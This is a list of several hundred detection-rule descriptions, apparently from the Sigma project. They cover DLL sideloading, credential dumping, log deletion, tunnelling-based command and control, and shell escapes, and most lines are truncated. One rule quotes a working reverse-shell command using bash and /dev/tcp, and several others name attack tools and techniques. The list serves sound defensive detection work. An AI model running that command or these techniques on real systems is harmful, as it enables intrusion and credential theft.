Detects the creation of a new office macro files on the system via an application (browser, mail client). This can help identify potential malicious activity, such as the download of macro-enabled doc
Files with well-known filenames (parts of credential dump software or files produced by them) creation
Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers. This may indicate an attempt to deploy malicious files such as web shells o
Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json. The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the co
Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM &
Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl. This activity may indicate a manual interruption of the antivirus service by an administrator,
Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems. This technique is commonly used by attackers to disable
Detects the creation of files with an executable or script extension by an Office application.
Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep. Adversaries may mask these targets to prevent a system from entering sleep or
Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.
Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses. This rule aims to detect traffic similar to one seen exploited in CVE-2021-42
Detects the execution of Python web servers via command line interface (CLI). After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a w
Detects the image load of VSS DLL by uncommon executables
Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks
Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors. These files (.ps1, .vbs, .js, .bat,
Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack
Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
Detects potential DLL sideloading of "dbghelp.dll"
Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
Detects loading of essential DLLs used by PowerShell by non-PowerShell process. Detects behavior similar to meterpreter's "load powershell" extension.
Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.
Detects Windows executables that write files with suspicious extensions
Detects DLL sideloading of "dbgcore.dll"
Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. Attackers may use this technique to evade detection and execute comman
Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. While it is a legitimate tool, intende
Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. While it is a legitimate tool, intende
Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence
Detects the image load of "Python Core" by a non-Python process. This might be indicative of a execution of executable that has been bundled from Python code. Various tools like Py2Exe, PyInstaller, a
Detects a potentially suspicious execution of a process located in the '/tmp/' folder
Detects network traffic potentially associated with a scraper botnet variant that uses the "Hello-World/1.0" user-agent string.
Detects an executable initiating a network connection to "ngrok" domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with suc
Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation. This behavior has been observed in the exploitation of SharePoint vulnerabil
Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.
Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments. This can be used to detect spear-phishing campaigns that use suspic
Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder. This kind of behaviour has been asso
Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes. It is often abused by attackers to
Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data
Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
Detects PowerShell creating a binary executable or a script file.
Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution
Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g "C:\Windows \System32") which can bypass Windows trusted path verification. This technique tricks Windows into treat
Detects the execution of a text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights.
Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings
Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing it's own malicious DLL. This behavior may indicate an attempt to execute remotely hosted, potential
Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts. Adversaries may attempt to access browser credential storage to extract
Detects file creation events with filename patterns used by Impacket.
Detects potential DLL sideloading of "mscorsvc.dll".
Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a l
Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.
Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt to execute malicious scripts within a trusted system process for
Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host
Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.
Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVEs exploits that targets Common Log File.
Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs
Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This beh
Detects files that have extensions commonly seen while SDelete is used to wipe files.
Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.
Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.
Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous at
Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
Detects known hacktool execution based on image name.
Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.
Detects network connections to BTunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Detects the use of the "capsh" utility to invoke a shell.
Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.
Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.
Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out fro
Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate pri
Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out fro
Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Detects file access requests to crypto currency files by uncommon processes. Could indicate potential attempt of crypto currency wallet stealing.
Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" fun
Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::m
Detects suspicious processes based on name and location that access the windows credential manager and vault. Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi
Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.
Detects potential DLL sideloading of "DbgModel.dll"
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually i
Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
Detects potential DLL sideloading of "MpSvc.dll".
Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process. This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensit
Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker t
Detects file creation events with filename patterns used by CrackMapExec.
Detects the presence and execution of Inveigh via dropped artefacts
Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file
Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies o
Detects a dump file written by QuarksPwDump password dumper
Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.
Detects default lsass dump filename generated by SafetyKatz.
Detects files written by the different tools that exploit HiveNightmare
Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.
Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.). It is highly recommended to
Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have
Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have
Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors
Detects network connections from the Equation Editor process "eqnedt32.exe".
Detects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
Detects a network connection initiated by Cmstp.EXE Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
Detects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads.
Detects network connections to Cloudflared tunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Detects the creation of files with scripting or executable extensions by Mysql daemon. Which could be an indicator of "User Defined Functions" abuse to download malware.
Detects programs that connect to known malware callback ports based on threat intelligence reports.
Detects outbound network connection initiated by Microsoft Dialer. The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Win
Detects "RegAsm.exe" initiating a network connection to public IP adresses
Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker
Detects suspicious user agent strings used by malware in proxy logs
Detects the creation of new files with the ".evtx" extension in non-common or non-standard location. This could indicate tampering with default EVTX locations in order to evade security controls or si
Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.
Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process
Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.
Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incom
Detects suspicious user agent strings used in APT malware in proxy logs
Detects Baby Shark C2 Framework default communication patterns
Detect the update check performed by Advanced IP/Port Scanner utilities.
Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. An initial baseline is required before using this utility to exclude third party RDP tooling tha
Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Att
Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communicatio
Detects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network co
Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.
Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
Detects initiated network connections to crypto mining pools
Detects the creation of a file with an uncommon extension in an Office application startup folder
Detect creation of suspicious executable file names. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework
Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.
Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them
Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to b
Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP
Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.
Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature
Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.
Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\<usern
Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powers
Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments
Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"
Detects a network connection initiated by "Regsvr32.exe"
Detects a remote DLL load event via "rundll32.exe".
Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can someti
Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.
Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.
Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and Loc
Detects changes to the ESXi syslog configuration via "esxcli"
Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.
Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM.
Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.
Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.
Detects potential SQL injection attempts via GET requests in access logs.
Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem
Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery
Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
Detects user account creation on ESXi system via esxcli
Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.
Detects default CSExec service filename which indicates CSExec service installation and execution
Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
Detects default RemCom service filename which indicates RemCom service installation and execution
Detects potential DLL sideloading of "AVKkid.dll"
Detects potential DLL sideloading of "EACore.dll"
Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directo
Detects potential DLL sideloading of "vivaldi_elf.dll"
Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.
Detects potential DLL sideloading of "CCleanerDU.dll"
Detects potential DLL sideloading of "CCleanerReactivator.dll"
Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
Detects programs on a Windows system that should not write executables to disk
Detects programs on a Windows system that should not write scripts to disk
Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.
Detects potential DLL sideloading of "appverifUI.dll"
Detects potential DLL sideloading of "ShellDispatch.dll"
Detects suspicious process command line that uses base64 encoded input for execution with a shell
Detects the creation of a new named pipe using the "mkfifo" utility
Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location
Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
Detects potential DLL sideloading of "7za.dll"
Detects potential DLL sideloading of "edputil.dll"
Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
Detects usage of crontab to list the tasks of the user
Detects the use of wget to download content to a suspicious directory
Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.
Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
Detects the use of grep to discover specific files created by the GobRAT malware
Detects the creation of shell scripts under the "profile.d" path.
Detects execution of shells from a parent process located in a temporary (/tmp) directory
Detects execution of binaries located in potentially suspicious locations via "nohup"
Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
Detects PowerShell core DLL being loaded by an Office Product
Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.
Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2
Detects potential DLL sideloading of "wwlib.dll"
Detects suspicious requests to Telegram API without the usual Telegram User-Agent
Detects Bitsadmin connections to domains with uncommon TLDs
Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
Detects the creation of the LiveKD driver, which is used for live kernel debugging
Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
Detects potential DLL sideloading of "chrome_frame_helper.dll"
Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location
Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
Detects the creation of binaries in the WinSxS folder by non-system processes
Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legiti
Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.
Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.
Detects Rclone config files being created
Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homo
Detects potential DLL sideloading of "SolidPDFCreator.dll"
Detects creation of a file named "ntds.dit" (Active Directory Database)
Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to
Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
Detects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.
Detects suspicious encoded User-Agent strings, as seen used by some malware.
Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"
Detects a suspicious curl process start the adds a file to a web request
Detects usage of "xterm" as a potential reverse shell tunnel
Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD accou
Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
Detects execution of the bash shell with the interactive flag "-i".
Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. Attackers often lever
Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell
Detects CLR DLL being loaded by an Office Product
Detects any assembly DLL being loaded by an Office Product
Detects Windows shells and scripting applications that write files to suspicious folders
Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
Detects potential DLL sideloading of rcdll.dll
Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".
Detects the creation of the default output filename used by the wmiexec tool
Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild
Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
Detects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files i
Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context
Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used
Detects the creation of a office macro file from a a suspicious process
Detects the creation of a new Outlook form which can contain malicious code
Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library
Detects cmstp loading "dll" or "ocx" files from suspicious locations
When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can
Detects SILENTTRINITY stager dll loading activity
Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL
Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence
Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrup
Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence
Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.
Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence
Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence
Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence
Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
Detects any GAC DLL being loaded by an Office Product
Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.
Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".
Detects the creation of a macro file for Outlook.
Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).
Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents
Detects the creation of a macro file for Outlook.
Detects when the file "passwd" or "shadow" is copied from tmp path
Detects common command used to enable bpf kprobes tracing
Detects possible Java payloads in web access logs
Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic
Detects attempts to force stop the ufw using ufw-init
Detects usage of system utilities to discover system network connections
Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system
Detects usage of the "touch" process in service file.
Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP fil
Detects the creation of files that look like exports of the local SAM (Security Account Manager)
Detects files dropped by Winnti as described in RedMimicry Winnti playbook
Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\
Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
Detects the creation of doas.conf file in linux host platform.
Detects creation of cron file or files in Cron directories which could indicates potential persistence.
Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.
Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.
Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.
Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method
Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
Detects suspicious sub processes of web server processes
Detects usage of "find" binary in a suspicious manner to perform discovery
Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks
Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks
Detects exploitation attempt using the JNDI-Exploit-Kit
Detects command line parameters or strings often used by crypto miners
Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
Attempts to load dismcore.dll after dropping it
Detects usage of the "usermod" binary to add users add users to the root or suoders groups
Potential adversaries stopping ETW providers recording loaded .NET assemblies.
Detects potential DLL sideloading using comctl32.dll to obtain system privileges
Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd
Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Err
Detects javaw.exe in AppData folder as used by Adwind / JRAT
Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can d
Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
Detects usage of system utilities (only grep and egrep for now) to discover security software discovery
